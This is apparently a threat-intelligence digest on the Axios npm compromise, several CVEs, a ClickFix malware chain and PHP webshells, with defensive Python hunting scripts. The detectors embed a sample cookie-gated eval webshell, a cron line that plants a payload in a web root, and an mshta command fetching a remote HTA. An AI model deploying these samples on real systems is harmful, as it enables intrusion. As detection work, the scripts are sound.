The Axios story grew teeth this afternoon: SentinelOne and Socket.dev published full IOC cards with C2 IP, domain, payload hashes, and confirmed BlueNoroff/UNC1069 attribution. Block sfrclak[.]com and 142.11.206.73 now. CISA added TrueConf CVE-2026-3502 to KEV, escalating this morning's Check Point disclosure from targeted zero-day to federal remediation mandate. A CVSS 9.8 Cisco IMC/SSM auth bypass (CVE-2026-20093) surfaced in afternoon feeds. If you only do one thing: deploy the Axios IOCs.
What changed since morning: SentinelOne and Socket.dev published comprehensive technical analyses filling in the IOC gaps from CrowdStrike's morning attribution. The maintainer confirmed the attack vector: browser session hijacking ("lifting sessions or cookies"), not credential phishing. ~600,000 downloads occurred in the ~3-hour exposure window (March 31, 00:21–03:25 UTC). Attribution now corroborated across three vendors: CrowdStrike (STARDUST CHOLLIMA), SentinelOne (BlueNoroff/UNC1069), Microsoft (Sapphire Sleet).
New IOCs:
- C2: sfrclak[.]com → 142.11.206.73:8000, HTTP POST beacon every 60 seconds
- Marker string: OrDeR_7077macWebT, linking to prior BlueNoroff webT campaigns (2023–2024)
- Packages: plain-crypto-js@4.2.1 (staging), axios@1.14.1 and axios@0.30.4 (poisoned releases)

Key new technical detail: the OIDC Trusted Publishing bypass worked because a legacy npm token coexisted alongside it. npm's auth logic prioritizes env-var tokens over OIDC, so the newer mechanism never came into play. The dropper self-destructs and replaces its own package.json with a clean decoy, leaving no trace in node_modules post-install. StepSecurity separately documented the 18-hour pre-staging and the 39-minute dual-branch timing.
Immediate actions: block the C2 at the perimeter; grep all node_modules directories and lockfiles for plain-crypto-js and for axios 1.14.1 / 0.30.4 (lockfile presence is a forensic indicator even after the dropper's self-deletion); rotate all credentials accessible from any system that installed the affected versions during the March 31 window. Sources: SentinelOne, Socket.dev, StepSecurity.
Covered by 3 sources.
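The lockfile sweep from the immediate-actions list, written out as an added example (not tooling from SentinelOne, Socket.dev or StepSecurity). It handles package-lock.json/npm-shrinkwrap.json (lockfileVersion 1, 2 and 3), yarn.lock (classic and berry) and pnpm-lock.yaml, reports the two poisoned axios versions and any version of plain-crypto-js, and can walk a whole tree. The indicator versions are the ones named above; the sample lockfile contents at the bottom are constructed for the demo.

```python
"""Lockfile sweep for the poisoned axios releases and the plain-crypto-js
staging package. Added example, not tooling from SentinelOne, Socket.dev or
StepSecurity; the indicators are the versions named above, and the sample
lockfile contents at the bottom are constructed for the demo."""
import json
import re
import sys
from pathlib import Path

# name -> poisoned versions. None means any version is an indicator,
# because plain-crypto-js existed only as the staging package.
INDICATORS = {
    "axios": {"1.14.1", "0.30.4"},
    "plain-crypto-js": None,
}
LOCKFILES = ("package-lock.json", "npm-shrinkwrap.json", "yarn.lock", "pnpm-lock.yaml")

# pnpm 'packages:' keys look like '  /axios@1.14.1:' (v6) or '  axios@1.14.1:' (v9),
# optionally quoted and optionally followed by a '(peer@ver)' suffix.
PNPM_KEY = re.compile(r"""^[ \t]*['"]?/?((?:@[^/\s]+/)?[^\s@/:'"]+)@(\d[^\s:('"]*)['"]?[:(]""", re.M)


def is_indicator(name, version):
    if name not in INDICATORS:
        return False
    bad = INDICATORS[name]
    return bad is None or version in bad


def scan_package_lock(text):
    """package-lock.json / npm-shrinkwrap.json, lockfileVersion 1, 2 or 3.
    Returns sorted (name, version, location); location drops the
    node_modules/ segments so v2 files (which carry both maps) report once."""
    data = json.loads(text)
    hits = set()
    for path, meta in data.get("packages", {}).items():      # v2/v3 flat map
        if path:                                              # "" is the root project
            name = path.rsplit("node_modules/", 1)[-1]
            if is_indicator(name, meta.get("version")):
                hits.add((name, meta.get("version"), path.replace("node_modules/", "")))

    def walk(deps, prefix):                                   # v1 nested tree
        for name, meta in deps.items():
            if is_indicator(name, meta.get("version")):
                hits.add((name, meta.get("version"), prefix + name))
            walk(meta.get("dependencies", {}), prefix + name + "/")

    walk(data.get("dependencies", {}), "")
    return sorted(hits)


def scan_yarn_lock(text):
    """yarn.lock: a header such as 'axios@^1.14.0:' or '"axios@npm:^1.14.0":'
    is followed by an indented 'version "1.14.1"' (or 'version: 1.14.1') line."""
    hits, current = set(), None
    for line in text.splitlines():
        if line and not line[0].isspace() and line.rstrip().endswith(":"):
            spec = line.rstrip().rstrip(":").split(",")[0].strip().strip('"')
            current = (spec.rsplit("@", 1)[0], spec)          # (name, original specifier)
        elif current and line.strip().startswith("version"):
            parts = line.strip().split(None, 1)
            if len(parts) == 2 and is_indicator(current[0], parts[1].strip('"')):
                hits.add((current[0], parts[1].strip('"'), current[1]))
    return sorted(hits)


def scan_pnpm_lock(text):
    """pnpm-lock.yaml: match resolved package keys anywhere in the file."""
    hits = set()
    for m in PNPM_KEY.finditer(text):
        if is_indicator(m.group(1), m.group(2)):
            hits.add((m.group(1), m.group(2), m.group(0).strip().rstrip(":(")))
    return sorted(hits)


def scan_lockfile(filename, text):
    if filename in ("package-lock.json", "npm-shrinkwrap.json"):
        return scan_package_lock(text)
    if filename == "yarn.lock":
        return scan_yarn_lock(text)
    if filename == "pnpm-lock.yaml":
        return scan_pnpm_lock(text)
    return []


def sweep(root):
    """Recurse from root; return {lockfile path: hits} for files with hits."""
    findings = {}
    for p in Path(root).rglob("*"):
        if p.name in LOCKFILES and p.is_file():
            hits = scan_lockfile(p.name, p.read_text(errors="replace"))
            if hits:
                findings[str(p)] = hits
    return findings


# Constructed samples (not real lockfiles) so the module demos offline.
SAMPLE_PACKAGE_LOCK = json.dumps({
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "demo-app"},
        "node_modules/axios": {"version": "1.14.1"},
        "node_modules/plain-crypto-js": {"version": "4.2.1"},
        "node_modules/lodash": {"version": "4.17.21"},
    },
})
SAMPLE_YARN_LOCK = 'axios@^1.14.0:\n  version "1.14.1"\n\nlodash@^4.17.0:\n  version "4.17.21"\n'
SAMPLE_PNPM_LOCK = ("packages:\n  /axios@0.30.4:\n    resolution: {integrity: sha512-deadbeef}\n"
                    "  /lodash@4.17.21:\n    resolution: {integrity: sha512-cafebabe}\n")

if __name__ == "__main__":
    if len(sys.argv) > 1:                                     # sweep a real tree
        for path, hits in sweep(sys.argv[1]).items():
            for name, version, where in hits:
                print(f"{path}: {name}@{version} ({where})")
    else:                                                     # demo on the samples
        for fn, text in (("package-lock.json", SAMPLE_PACKAGE_LOCK),
                         ("yarn.lock", SAMPLE_YARN_LOCK),
                         ("pnpm-lock.yaml", SAMPLE_PNPM_LOCK)):
            print(fn, scan_lockfile(fn, text))
```

Run it as `python sweep.py /path/to/repos` to walk checked-out code or CI caches; a hit on plain-crypto-js at any version is the forensic signal even when node_modules is already clean, and a hit on either axios version means the host installed during the window and goes on the credential-rotation list.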
The OIDC bypass is the architectural lesson: layered auth controls aren't additive when the old mechanism still works. First infection 89 seconds post-publication — manual incident response is structurally irrelevant at that tempo. This is xz-utils-level premeditation applied to the JavaScript ecosystem.
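A pre-publish guard for the token-coexistence problem, as an added example (not npm's or StepSecurity's code). It assumes the behaviour the write-up reports, that an env-var or .npmrc token takes precedence over OIDC, and therefore that a trusted-publishing pipeline should carry no _authToken at all. NODE_AUTH_TOKEN and NPM_TOKEN are the usual CI variable names and are an assumed list; the demo inputs are constructed.

```python
"""Pre-publish guard: refuse to publish when a legacy npm token is present
alongside OIDC trusted publishing. Added example, not npm's own logic; the
env-var list and the two .npmrc locations checked are assumptions."""
import os
import re
import sys
from pathlib import Path

TOKEN_ENV_VARS = ("NODE_AUTH_TOKEN", "NPM_TOKEN")
# '//registry.example/:_authToken=VALUE' or a bare '_authToken=VALUE'
AUTH_LINE = re.compile(r"^\s*(?:(//\S*?):)?_authToken\s*=\s*(\S+)", re.M)
ENV_REF = re.compile(r"\$\{?(\w+)\}?")          # ${VAR} or $VAR as npm expands it


def find_legacy_tokens(env, npmrc_texts):
    """Return [(where, severity, detail)]. env is a mapping like os.environ;
    npmrc_texts maps a label (usually the path) to that .npmrc's contents."""
    findings = []
    for var in TOKEN_ENV_VARS:
        if env.get(var):
            findings.append((f"env:{var}", "block", "token variable is set in the publish environment"))
    for label, text in npmrc_texts.items():
        for m in AUTH_LINE.finditer(text):
            registry = m.group(1) or "(default registry)"
            value = m.group(2)
            where = f"{label}:{registry}"
            ref = ENV_REF.fullmatch(value)
            if ref is None:
                findings.append((where, "block", "literal _authToken in .npmrc"))
            elif env.get(ref.group(1)):
                findings.append((where, "block", f"_authToken expands from ${ref.group(1)}, which is set"))
            else:
                # An unset reference yields no token, but it is still a classic-auth
                # line that should not exist in a trusted-publishing pipeline.
                findings.append((where, "warn", f"_authToken references unset ${ref.group(1)}"))
    return findings


def should_block(findings):
    return any(sev == "block" for _, sev, _ in findings)


def npmrc_candidates(cwd=None):
    """Project and user-level .npmrc files (assumption: the two standard spots)."""
    return [Path(cwd or os.getcwd()) / ".npmrc", Path.home() / ".npmrc"]


# Constructed demo inputs: a pipeline that still carries a classic token.
DEMO_ENV = {"NODE_AUTH_TOKEN": "npm_EXAMPLE_NOT_A_REAL_TOKEN", "CI": "true"}
DEMO_NPMRC = {"/work/app/.npmrc": "//registry.npmjs.org/:_authToken=${NODE_AUTH_TOKEN}\nalways-auth=true\n"}

if __name__ == "__main__":
    if "--demo" in sys.argv:
        findings = find_legacy_tokens(DEMO_ENV, DEMO_NPMRC)
    else:
        texts = {str(p): p.read_text() for p in npmrc_candidates() if p.is_file()}
        findings = find_legacy_tokens(os.environ, texts)
    for where, severity, detail in findings:
        print(f"[{severity}] {where}: {detail}")
    if should_block(findings):
        print("refusing to publish: legacy token would take precedence over OIDC")
        sys.exit(1)
    print("no legacy npm token present")
```

Put it as the step immediately before `npm publish` in the workflow; a non-zero exit stops the job. The point of the guard is the architectural lesson above: the check has to prove the old path is absent, not merely that the new path is configured.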
New story. Cisco patched CVE-2026-20093 (CVSS 9.8) in the Integrated Management Controller and Smart Software Manager — unauthenticated remote attackers can bypass authentication and gain elevated system access. IMC is the out-of-band management plane for Cisco UCS servers; compromise here is below-OS-level access, invisible to host EDR. No active exploitation reported yet. Source: The Hacker News.
If you're running Cisco UCS, this is your BMC/IPMI-equivalent auth bypass. Out-of-band management compromise doesn't show up in your SIEM. These get weaponized fast: patch today, and confirm that IMC interfaces are reachable only from an isolated management network, never from general-purpose or internet-facing segments.
What changed since morning: CISA added CVE-2026-3502 to KEV citing confirmed active exploitation, validating this morning's Check Point report of China-nexus zero-day exploitation in SE Asian government networks. BOD 22-01 remediation obligations now apply for FCEB agencies. The enrichment EPSS (0.00009) is stale — it predates the KEV addition. Confirm the specific due date on the live KEV catalog.
Morning's "niche targeted zero-day in a video conferencing client chosen specifically for its air-gapped security" is now an officially confirmed actively-exploited vulnerability with a federal remediation mandate. The irony hasn't diminished.
New story. Threat actors seized administrative control of Drift Protocol's Security Council — a DeFi governance mechanism — and drained at least $280M. Independent researchers attribute to Lazarus Group. The attack vector is notable: governance/admin privilege seizure rather than smart contract exploitation, which is an emerging pattern in blockchain platform attacks. DPRK-attributed DeFi theft is now in the multi-billion-dollar cumulative range. Covered by 2 sources.
Governance mechanism attacks on DAOs are underappreciated relative to smart contract exploits. If the post-mortem confirms the takeover vector, expect replication against other on-chain governance systems. Adds to the DPRK theme dominating this week — they're running supply chain ops and $280M heists simultaneously.
New story. Censys surfaced a live ClickFix campaign via a compromised Turkish medical equipment site. Five-stage chain: ClickFix social engineering → mshta.exe LOLBin (T1218.005) → emoji-obfuscated HTA → steganographic JPEG from archive.org containing the PhantomVAI MaaS loader → process-hollowed XWorm V5.6 in RegAsm.exe (T1055.012). Full static recovery was achieved without sandbox execution. IOCs: C2 at 86.106.85[.]194:9000 (M247/AS9009), staging domain 4a-m[.]al, 7 SHA256 and 5 MD5 hashes across all stages. PhantomVAI is sold on BreachForums, targeting government, healthcare, tech, and manufacturing.
Probably the most forensically thorough writeup in today's batch. The enrichment pipeline missed the C2 IP — detection teams should add 86.106.85.194 manually. PhantomVAI's MaaS model means the specific operator is unknown but the loader is shared across campaigns.
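Hunting logic for the two process-level links of that chain (mshta.exe pulling a remote HTA, RegAsm.exe hollowed as the final host), run over constructed Sysmon-style process-creation records. This is an added example, not Censys's tooling: the field names follow Sysmon Event ID 1, the parent/child heuristics (explorer.exe or a console as the mshta parent for a Run-dialog paste, RegAsm.exe with no assembly argument outside build tooling) are assumptions, and the sample events and the staging URL in them are constructed.

```python
"""Process-chain hunt for ClickFix -> mshta.exe -> RegAsm.exe. Added example,
not Censys's code; heuristics and sample events are assumptions/constructed."""
import re

REMOTE_URL = re.compile(r"https?://\S+", re.I)
# Processes that legitimately launch RegAsm.exe in a build/dev context (assumption).
BUILD_PARENTS = {"msbuild.exe", "devenv.exe", "vbcscompiler.exe", "dotnet.exe"}
# Parents that indicate a user pasted the command (Win+R dialog or a console).
PASTE_HOSTS = {"explorer.exe", "cmd.exe", "powershell.exe"}


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def ancestors(ev, by_pid, depth=8):
    """Image basenames of ev's parent, grandparent, ... (nearest first)."""
    chain, cur = [], by_pid.get(ev["ParentProcessId"])
    while cur is not None and depth > 0:
        chain.append(basename(cur["Image"]))
        cur = by_pid.get(cur["ParentProcessId"])
        depth -= 1
    return chain


def detect(events):
    """Return [(pid, technique, note)] for records matching the chain."""
    by_pid = {e["ProcessId"]: e for e in events}
    alerts = []
    for ev in events:
        img, cmd = basename(ev["Image"]), ev["CommandLine"]
        lineage = ancestors(ev, by_pid)
        if img == "mshta.exe" and REMOTE_URL.search(cmd):
            note = "mshta.exe fetching a remote HTA"
            if lineage and lineage[0] in PASTE_HOSTS:
                note += f"; parent {lineage[0]} (Run-dialog/console paste, ClickFix-style)"
            alerts.append((ev["ProcessId"], "T1218.005", note))
        elif img == "regasm.exe":
            tokens = cmd.replace('"', " ").split()
            has_assembly = any(t.lower().endswith(".dll") for t in tokens[1:])
            parent = lineage[0] if lineage else "(unknown)"
            if not has_assembly or parent not in BUILD_PARENTS:
                note = f"RegAsm.exe spawned by {parent}"
                if not has_assembly:
                    note += " with no assembly argument (hollowing host pattern)"
                if "mshta.exe" in lineage:
                    note += "; descends from mshta.exe, matching the full chain"
                alerts.append((ev["ProcessId"], "T1055.012", note))
    return alerts


# Constructed Sysmon-style records: one malicious chain, two benign look-alikes.
SAMPLE_EVENTS = [
    {"ProcessId": 100, "ParentProcessId": 1, "Image": r"C:\Windows\explorer.exe",
     "CommandLine": "explorer.exe"},
    {"ProcessId": 200, "ParentProcessId": 100, "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe https://staging.example.invalid/verify.hta"},
    {"ProcessId": 300, "ParentProcessId": 200,
     "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
     "CommandLine": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"},
    {"ProcessId": 400, "ParentProcessId": 1, "Image": r"C:\Program Files\MSBuild\MSBuild.exe",
     "CommandLine": "MSBuild.exe build.proj"},
    {"ProcessId": 401, "ParentProcessId": 400,
     "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
     "CommandLine": r"RegAsm.exe /codebase C:\build\Interop.Vendor.dll"},
    {"ProcessId": 500, "ParentProcessId": 100, "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta.exe C:\Program Files\Vendor\help.hta"},
]

if __name__ == "__main__":
    for pid, technique, note in detect(SAMPLE_EVENTS):
        print(pid, technique, note)
```

Pair this with a network rule for the C2 (86.106.85.194:9000) so the process alert and the beacon corroborate each other; the RegAsm.exe heuristic on its own will also fire on developer machines, which is why the lineage check back to mshta.exe is the part worth keeping.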
New story. Wordfence weekly report covers 106 vulnerabilities across 77 plugins and 22 themes. Headliners: CVE-2026-4001 (CVSS 9.8), unauthenticated RCE via unsanitized eval() on an attacker-controlled pricing formula in WooCommerce Custom Product Addons Pro. CVE-2026-4350 (CVSS 8.1), unauthenticated arbitrary file deletion in Perfmatters (200K+ installations): delete wp-config.php via path traversal → force installer → hijack database → RCE. CVE-2026-4283 (CVSS 9.1), unauthenticated account destruction in WP DSGVO Tools. Six vulnerabilities remain unpatched. Covered by 2 sources.
eval() on attacker input in 2026. The Perfmatters kill chain (file deletion → installer → database hijack) is the more interesting attack path: with wp-config.php gone, WordPress behaves as if it were never installed and exposes the setup wizard, which the attacker points at a database they control. Six unpatched vulns including PHP object injection are the residual risk for WordPress operators.
What changed since morning: Beyond the Adversa AI prompt injection finding covered this morning, threat actors have created fake GitHub repos distributing the leaked Claude Code source as bait, delivering Vidar infostealer and GhostSocks proxy malware as second-stage payloads. Tens of thousands of downloads. Covered by 4 sources.
Separate threat threads sharing a common trigger event: the prompt injection vuln is a code-level finding, the trojanized repos are social engineering. "Download the leaked source and see how it works" is a textbook developer-targeted lure and will recur with any high-profile AI tool leak.
New story. Microsoft Defender research documents active targeting of Linux hosting environments with PHP webshells that gate execution on attacker-supplied HTTP cookie values — remaining completely dormant during normal traffic, invisible in logs. Cron jobs via cPanel/jailshell recreate the obfuscated PHP loader if removed, defeating standard cleanup. Attack chain: compromised hosting creds → cPanel → cron-scheduled obfuscated loader → cookie-gated RCE on demand. ATT&CK: T1505.003, T1053.003, T1027. KQL hunting queries provided for Defender XDR.
The self-healing cron + cookie-gating combination is what makes this nasty. Webshell is invisible during normal traffic AND survives remediation without simultaneous cron cleanup. Shared hosting operators are the primary risk population.
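Hunting heuristics for both halves of that persistence pattern, the dormant cookie-gated PHP and the cron job that rebuilds it, as an added example (not Microsoft's KQL). It scores PHP sources on a cookie read sitting close to a dynamic-execution sink, and crontab lines on schedule plus what the command touches; the regexes and weights are assumptions, not signatures from the report, and the sample PHP stub and crontab lines are constructed.

```python
"""Heuristic hunt for cookie-gated PHP webshells and the cron lines that
re-create them. Added example, not Microsoft Defender's queries; patterns,
weights and the samples below are assumptions/constructed."""
import re
import sys
from pathlib import Path

COOKIE = re.compile(r"\$_COOKIE\b|\$_SERVER\s*\[\s*['\"]HTTP_COOKIE", re.I)
EXEC = re.compile(r"\b(eval|assert|create_function|system|passthru|shell_exec|"
                  r"exec|popen|proc_open)\s*\(|`[^`]+`", re.I)
DECODE = re.compile(r"\b(base64_decode|gzinflate|gzuncompress|str_rot13|hex2bin|strrev)\s*\(", re.I)
BLOB = re.compile(r"['\"][A-Za-z0-9+/=]{120,}['\"]")
PHP_THRESHOLD = 3     # a cookie read next to an execution sink reaches this alone
CRON_THRESHOLD = 3


def score_php(src, window=300):
    """(score, reasons). Core signal: cookie read within `window` characters of
    a dynamic-execution sink; decode calls and long blobs add supporting weight."""
    reasons, score = [], 0
    cookies = [m.start() for m in COOKIE.finditer(src)]
    sinks = [m.start() for m in EXEC.finditer(src)]
    if any(abs(c - s) <= window for c in cookies for s in sinks):
        score += 3
        reasons.append("cookie value read near a dynamic-execution sink")
    if sinks and DECODE.search(src):
        score += 1
        reasons.append("decode-then-execute pattern")
    if BLOB.search(src):
        score += 1
        reasons.append("long base64-like string literal")
    return score, reasons


def score_cron(line):
    """(score, reasons) for one crontab line; env lines and comments score 0."""
    reasons, score = [], 0
    fields = line.split(None, 5)
    if line.lstrip().startswith("#") or len(fields) < 6:
        return 0, reasons
    minute, cmd = fields[0], fields[5]
    if minute == "*" or minute.startswith("*/"):
        score += 1
        reasons.append("minute-level schedule")
    if re.search(r"\bphp\b", cmd) and re.search(r"public_html|/tmp/|/dev/shm/", cmd):
        score += 1
        reasons.append("php touching web root or scratch space")
    if re.search(r"\b(curl|wget)\b.*\|\s*(php|sh|bash)\b", cmd):
        score += 2
        reasons.append("remote fetch piped into an interpreter")
    if re.search(r"base64_decode\(|base64\s+(-d|--decode)\b", cmd):
        score += 1
        reasons.append("inline base64 decode")
    return score, reasons


def hunt(root):
    """Walk an account tree: PHP files over threshold, plus crontab lines in any
    file named 'crontab' or living under a cron-named directory."""
    findings = []
    for p in Path(root).rglob("*"):
        if not p.is_file():
            continue
        if p.suffix.lower() in (".php", ".phtml", ".inc"):
            score, reasons = score_php(p.read_text(errors="replace"))
            if score >= PHP_THRESHOLD:
                findings.append((str(p), score, reasons))
        elif p.name == "crontab" or "cron" in str(p.parent).lower():
            for line in p.read_text(errors="replace").splitlines():
                score, reasons = score_cron(line)
                if score >= CRON_THRESHOLD:
                    findings.append((f"{p}:{line.strip()[:60]}", score, reasons))
    return findings


# Constructed samples: a dormant cookie-gated stub, a benign cookie read, crontab lines.
SAMPLE_SHELL = """<?php
if (isset($_COOKIE['sid']) && md5($_COOKIE['sid']) === '5d41402abc4b2a76b9719d911017c592') {
    eval(base64_decode($_COOKIE['d']));
}
"""
SAMPLE_BENIGN = "<?php\n$lang = $_COOKIE['lang'] ?? 'en';\necho htmlspecialchars($lang);\n"
SAMPLE_CRON_BAD = ("*/5 * * * * /usr/local/bin/php -r 'file_put_contents(\"/home/acct/public_html/"
                   ".wp-cache.php\", base64_decode(\"PD9waHAg\"));' >/dev/null 2>&1")
SAMPLE_CRON_OK = "0 3 * * * /usr/local/cpanel/bin/backup --quiet"

if __name__ == "__main__":
    if len(sys.argv) > 1:
        for where, score, reasons in hunt(sys.argv[1]):
            print(score, where, "; ".join(reasons))
    else:
        print("php stub:", score_php(SAMPLE_SHELL))
        print("benign php:", score_php(SAMPLE_BENIGN))
        print("cron:", score_cron(SAMPLE_CRON_BAD), score_cron(SAMPLE_CRON_OK))
```

Run it per account (`python hunt.py /home/acct`) and treat the two finding types together: removing a flagged PHP file without also removing the cron line that writes it is exactly the cleanup failure described above. Legitimate wp-cron entries score around 2 on the cron heuristic, which is why the threshold sits at 3; tune the weights against your own hosting fleet before relying on them.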
New story. Microsoft's post-RSAC threat landscape report quantifies AI-assisted phishing at 54% click-through vs. ~12% traditional, roughly a 4.5x improvement in attacker economics driven by precision targeting. Tycoon2FA (Storm-1747) was disrupted via 330 domain seizures with Europol after handling ~62% of Microsoft-blocked phishing at peak. Tycoon2FA operated as subscription-based AitM, bypassing MFA by intercepting session tokens in real time.
12% → 54% is not marginal — it's a category shift. The Tycoon2FA disruption is supply-chain pressure, not a terminal takedown; the modular subscription model means capability disperses to successor platforms.
New story. Researchers demonstrated Rowhammer extended to Nvidia GPU DRAM, enabling malicious cloud co-tenants to achieve full root on physical host machines. Structural analog to Spectre/Meltdown for the multi-tenant GPU cloud era. Full paper with affected GPU SKUs and ECC effectiveness pending.
Relevant for anyone running multi-tenant GPU cloud (AWS P-series, Azure ND-series, GCP A100/H100 pools). The threat model: malicious ML workload tenant compromises the hypervisor via GPU Rowhammer. Watch for the full paper.
New story. Schneier covers an executive order requiring FCC approval for any new foreign-manufactured router, with foreign investor/influence disclosure and a credible manufacturing shift plan. Only significant US-made consumer router currently: Starlink WiFi. Does not require disposal of existing hardware. Netgear and other major brands manufacture entirely abroad.
Procurement teams should flag this immediately. The Volt Typhoon router pre-positioning concern is clearly the underlying driver. Watch the DoD/DHS exemption list — that's where enterprise-grade foreign-manufactured equipment may get carved out.
New story. Thirteen CVEs in Rack (web server interface underpinning Rails and the Ruby ecosystem), affecting versions up to 2.2.22, 3.1.20, and 3.2.5. Bug classes span CRLF injection, ReDoS, path traversal, X-Accel-Mapping header abuse, and multipart resource consumption. Coordinated disclosure with GHSA references on the majority. Fix: ≥3.2.6 / ≥3.1.21 / ≥2.2.23.
The Rack::Sendfile X-Accel-Mapping permissive regex (CVE-2026-34830) could enable internal file exposure via nginx accelerated serving — that's the one to prioritize for web security teams.
What changed since morning: The routine "five security fixes" mention now has CVE identifiers: CVE-2026-35388 (unprotected alternate channel in proxy-mode multiplexing), CVE-2026-35386 (ssh_config behavior order), CVE-2026-35387/35414 (control flow including certificate authorized_keys), CVE-2026-35385 (scp permissions). No CVSS or exploitation data yet. CVE-2026-35388 is the one to watch — ControlMaster/ControlPath session hijacking or privilege escalation in multi-user environments. Sources: VulDB entries.
The afternoon Talos coverage also flags without dedicated entries: F5 BIG-IP DoS-to-critical-RCE upgrade now exploited in the wild with a CISA warning, and Google Chrome's fourth zero-day of 2026. Watch for standalone coverage on both.
No significant changes since morning on: NetScaler KEV deadline, ShareFile RCE chain, DarkSword/Coruna iOS exploit kits, Qilin EDR killer, BRICKSTORM vSphere, BPFDoor variants, Hitachi Energy Ellipse, Siemens SICAM 8, Yokogawa CENTUM VP, Vite dev server, EvilTokens PhaaS, Handala/Stryker, Keycloak, TeamPCP cascade, TasksJacker, or the broader DPRK supply chain cluster beyond Axios.
~52 entries skipped: 27 general (Apple nostalgia, AI model releases, vendor marketing, Gartner frameworks, EFF policy, off-topic tech), 21 vulnerability (VulDB stubs for Acronis/SillyTavern/postiz-app/SignalK/mbed TLS/Balena Etcher, misc WordPress/PHP CMS), 3 government (DOJ non-cyber press releases — feed is pulling broad OPA output), 1 threat-actor (broken ReversingLabs feed fetch).
Editorial note: the afternoon's primary value-add is the Axios IOC card — morning had attribution and alarm, afternoon has the blocking indicators and forensic artifacts your SOC actually needs. Cisco IMC CVSS 9.8 and TrueConf's KEV promotion are the other action items. Everything else is incremental or new-but-not-urgent. The DPRK is having quite a week.